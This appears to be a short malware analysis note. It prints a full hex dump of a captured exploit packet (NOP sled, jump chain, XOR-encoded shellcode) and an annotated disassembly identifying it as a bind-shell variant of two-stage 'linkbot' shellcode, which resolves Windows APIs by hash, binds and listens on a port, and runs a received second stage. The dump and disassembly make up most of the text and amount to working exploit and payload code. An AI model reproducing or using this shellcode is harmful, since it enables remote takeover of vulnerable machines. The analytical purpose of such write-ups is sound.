Reference: ce332d14e71a09b192fa98ee1b030d15.bin
00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................| 00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............| 00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@..G.qN.| 00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................| 00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....| 00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |................| 00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7.w........| 00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |................| 000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |................| 00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000400 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 4d e6 13 |..........A..M..| 00000410 41 5e 80 74 31 ff 42 e2 f9 eb 05 e8 e6 ff ff ff |A^.t1.B.........| 00000420 71 99 26 c9 01 72 c9 02 4e c9 32 5e ef c9 3a 4a |q.&..r..N.2^..:J| 00000430 aa 07 42 42 42 11 14 c9 1d 7e c9 1e 79 3a 41 9d |..BBB....~..y:A.| 00000440 11 c9 19 62 41 9d 11 c1 81 46 c9 71 41 b5 71 8b |...bA....F.qA.q.| 00000450 ee 70 8a 83 83 47 c6 82 37 b4 69 88 37 ab 1a 69 |.p...G..7.i.7..i| 00000460 9a 93 a9 1c 41 1c 66 41 9d 24 c9 49 c9 1c 5e 41 |....A.fA.$.I..^A| 00000470 9d c9 46 c9 41 85 1c 19 bd a2 1c 2a 71 70 42 42 |..F.A......*qpBB| 00000480 2a 35 31 70 1d 16 f8 d0 2c 46 c6 bd 94 c9 ba c3 |*51p....,F......| 00000490 ae 42 40 42 42 c9 ae 11 28 43 28 40 f8 c1 11 c1 |.B@BB...(C(@....| 000004a0 42 bd 94 11 11 11 2a 40 42 e2 e1 c9 96 c9 9a 28 |B.....*@B......(| 000004b0 52 10 11 f8 42 d2 e4 80 bd 94 02 12 11 f8 38 79 |R...B.........8y| 000004c0 31 e3 bd 94 12 12 11 f8 52 91 2b 42 bd 94 c9 9a |1.......R.+B....| 000004d0 71 82 12 f6 40 12 17 11 f8 42 1a 22 a0 bd 94 fd |q...@....B."....| 000004e0 97 a2 84 30 bd a7 6b 63 71 6b 62 6e 66 66 69 64 |...0..kcqkbnffid| 000004f0 6d 72 64 76 77 70 6c 72 62 61 67 6c 66 63 62 65 |mrdvwplrbaglfcbe| 00000500 76 63 77 7a 7a 64 77 72 6e 61 78 71 6c 64 70 73 |vcwzzdwrnaxqldps| 00000510 6f 62 64 71 64 77 79 71 79 69 63 69 72 69 6b 69 |obdqdwyqyiciriki| 00000520 75 66 64 69 73 73 62 72 6e 6c 72 69 6b 72 6e 69 |ufdissbrnlrikrni| 00000530 61 6d 68 79 71 68 70 68 65 63 62 7a 74 78 72 75 |amhyqhphecbztxru| 00000540 6c 74 75 6d 79 62 6b 67 6c 70 61 6a 6b 73 75 71 |ltumybkglpajksuq| 00000550 61 6b 68 6a 65 72 67 61 6d 72 6c 76 70 75 79 6a |akhjergamrlvpuyj| 00000560 66 69 6f 68 7a 72 75 79 72 6b 70 6e 61 6f 70 78 |fiohzruyrkpnaopx| 00000570 7a 76 73 66 61 62 6e 6d 74 6f 63 68 68 6a 69 63 |zvsfabnmtochhjic| 00000580 79 64 67 62 7a 67 66 72 66 6f 73 7a 6d 73 72 74 |ydgbzgfrfoszmsrt| 00000590 6d 66 6e 6a 6f 76 6a 6a 76 66 78 6d 78 64 76 67 |mfnjovjjvfxmxdvg| 000005a0 73 73 6c 64 72 66 6f 63 6b 68 7a 6f 77 6f 71 79 |ssldrfockhzowoqy| 000005b0 62 69 6d 77 70 73 7a 6c 65 72 6c 73 61 6d 68 76 |bimwpszlerlsamhv| 000005c0 6e 75 65 67 76 71 75 77 71 78 6c 6b 64 6b 62 75 |nuegvquwqxlkdkbu| 000005d0 6d 65 8b 45 30 05 24 fb ff ff ff e0 eb f4 77 75 |me.E0.$.......wu| 000005e0 0b 0b 1b 00 77 68 72 6e 70 76 6c 63 61 74 78 6f |....whrnpvlcatxo| 000005f0 6a 6d 6b 76 6c 6b 6a 7a 63 66 63 76 64 68 75 76 |jmkvlkjzcfcvdhuv| 00000600 79 73 78 6b 6e 71 6f 7a 68 71 62 68 6a 74 6b 6e |ysxknqozhqbhjtkn| 00000610 70 6e 78 74 6c 77 6b 75 eb 06 61 69 59 1c 00 01 |pnxtlwku..aiY...| 00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 62 6c 77 66 6e |.D$........blwfn| 00000630 67 6b 6b 62 61 6c 6e 69 69 73 64 73 6d 73 61 6b |gkkbalniisdsmsak| 00000640 64 66 61 7a 6c 71 74 70 61 61 74 66 69 78 5c 00 |dfazlqtpaatfix\.| 00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............| 00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......| 00000670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F| 00000680 01 00 00 00 01 00 00 00 07 00 |..........|
This shellcode is obviously the bind-version of the two-stage linkbot shellcode.
00402095 33db xor ebx,ebx 00402097 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 0040209b 8b40 0c mov eax,dword ptr ds:[eax+c] 0040209e 8b70 1c mov esi,dword ptr ds:[eax+1c] 004020a1 ad lods dword ptr ds:[esi] 004020a2 8b78 08 mov edi,dword ptr ds:[eax+8] 004020a5 e8 45000000 call bremen.004020ef 004020aa 53 push ebx 004020ab 56 push esi 004020ac 8b5f 3c mov ebx,dword ptr ds:[edi+3c] 004020af 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78] 004020b3 03df add ebx,edi 004020b5 53 push ebx 004020b6 8b5b 20 mov ebx,dword ptr ds:[ebx+20] 004020b9 03df add ebx,edi 004020bb 53 push ebx 004020bc 83c3 04 add ebx,4 004020bf 8b33 mov esi,dword ptr ds:[ebx] 004020c1 03f7 add esi,edi 004020c3 33c9 xor ecx,ecx 004020c5 ac lods byte ptr ds:[esi] 004020c6 32c8 xor cl,al 004020c8 c1c1 05 rol ecx,5 004020cb 84c0 test al,al 004020cd ^75 f6 jnz short bremen.004020c5 004020cf 2bca sub ecx,edx 004020d1 ^75 e9 jnz short bremen.004020bc 004020d3 58 pop eax 004020d4 2bd8 sub ebx,eax 004020d6 d1eb shr ebx,1 004020d8 5e pop esi 004020d9 035e 24 add ebx,dword ptr ds:[esi+24] 004020dc 03df add ebx,edi 004020de 66:8b0b mov cx,word ptr ds:[ebx] 004020e1 8b5e 1c mov ebx,dword ptr ds:[esi+1c] 004020e4 03df add ebx,edi 004020e6 8b048b mov eax,dword ptr ds:[ebx+ecx*4] 004020e9 03c7 add eax,edi 004020eb 5e pop esi 004020ec 5b pop ebx 004020ed -ffe0 jmp eax 004020ef 5e pop esi 004020f0 68 33320000 push 3233 004020f5 68 7773325f push 5f327377 004020fa 54 push esp 004020fb ba 926e0484 mov edx,84046e92 00402100 ffd6 call esi ; loadlibrarya() 00402102 8bf8 mov edi,eax 00402104 81ec 00020000 sub esp,200 0040210a 8bec mov ebp,esp 0040210c 53 push ebx 0040210d 6a 01 push 1 0040210f 6a 02 push 2 00402111 ba 83538300 mov edx,835383 00402116 ffd6 call esi ; socket() 00402118 53 push ebx 00402119 53 push ebx 0040211a 53 push ebx 0040211b 68 0200d63a push 3ad60002 ; 3ad6 <- port 00402120 8bd4 mov edx,esp 00402122 8bd8 mov ebx,eax 00402124 6a 10 push 10 00402126 52 push edx 00402127 53 push ebx 00402128 ba 0090a6c2 mov edx,c2a69000 0040212d ffd6 call esi ; bind() 0040212f 40 inc eax 00402130 50 push eax 00402131 53 push ebx 00402132 ba 7a3b73a1 mov edx,a1733b7a 00402137 ffd6 call esi ; listen() 00402139 50 push eax 0040213a 50 push eax 0040213b 53 push ebx 0040213c ba 10d36900 mov edx,69d310 00402141 ffd6 call esi ; accept() 00402143 8bd8 mov ebx,eax 00402145 33c0 xor eax,eax 00402147 50 push eax 00402148 b4 02 mov ah,2 0040214a 50 push eax 0040214b 55 push ebp 0040214c 53 push ebx 0040214d ba 005860e2 mov edx,e2605800 00402152 ffd6 call esi ; recv() 00402154 bf 1cf174c0 mov edi,c074f11c ; authentication key 00402159 ffe5 jmp ebp
